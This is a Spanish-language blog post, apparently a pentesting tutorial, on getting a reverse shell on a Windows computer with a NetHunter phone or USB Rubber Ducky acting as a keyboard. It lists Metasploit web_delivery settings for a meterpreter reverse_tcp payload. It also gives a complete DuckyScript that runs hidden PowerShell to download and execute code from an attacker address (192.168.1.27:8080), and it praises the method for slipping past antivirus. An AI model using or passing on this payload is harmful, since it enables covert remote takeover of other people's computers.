Conexión inversa usando como vector NetHunter o Rubber Ducky (HID attack)

Kali NetHunter (kali.org/kali-linux-nethunter), la plataforma Android de pentesting para dispositivos Nexus, tiene muchas opciones interesantes, entre ellas el "DuckHunter HID" que puede convertir rápida y fácilmente los scripts del USB Rubber Ducky para realizar ataques de tipo HID keyboard, ya sabéis, ataques que convierten el smartphone y su cable OTG USB en un teclado preprogramado, capaz de escribir cualquier comando dado...

Lo que vamos a hacer a continuación es algo muy simple, pero puede ser peligroso cuando se implementa.

Preparando el backdoor en Metasploit

Vamos a utilizar el módulo “script web delivery” (rapid7.com/db/modules/exploit/multi/script/web_delivery), que tiene la ventaja de no tener que crear un archivo ejecutable, y muchas probabilidades de transmitir el malware sin que el AV lo detecte.
 

Para nuestra prueba, elegimos el objetivo 2, que va a generar una secuencia de comandos que se utilizará en PowerShell

Configuración del payload
Payload: payload windows/meterpreter/reverse_tcp
LHOST: IP local, que recibirá la conexión
URIPATH: se puede poner simplemente una “/”
LPORT: puerto local, por defecto el 4444
Script: exploit -j


Como veis, payload es muy simple y se realiza en unos pocos segundos en la máquina objetivo.

Portándolo a DuckHunter HID

Ahora lo que tenemos que hacer es poner la secuencia de comandos que se generó en el DuckHunter HID:

DELAY 1000
GUI r
DELAY 500
STRING powershell.exe -nop -w hidden -c $g=new-object net.webclient;
$g.proxy=[Net.WebRequest]::GetSystemWebProxy();
$g.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX
$g.downloadstring('http://192.168.1.27:8080/')


Y después de conectar el Nexus en el equipo de la víctima y ejecutar la secuencia de comandos, obtenemos acceso remoto:


Para ver más opciones, solamente escribir el comando de help.

USB-Rubber-Ducky

Del mismo modo, también se puede utilizar el USB-Rubber-Ducky que proporciona muy buen soporte para la creación de payloads. Se puede hacer on line
en https://ducktoolkit.com/encoder.

El Rubber-Ducky se puede encontrar en http://hakshop.myshopify.com

Por último, os dejo un pequeño vídeo con una demo:

by c4io
#enjoy :)

0 comentarios :

Publicar un comentario en la entrada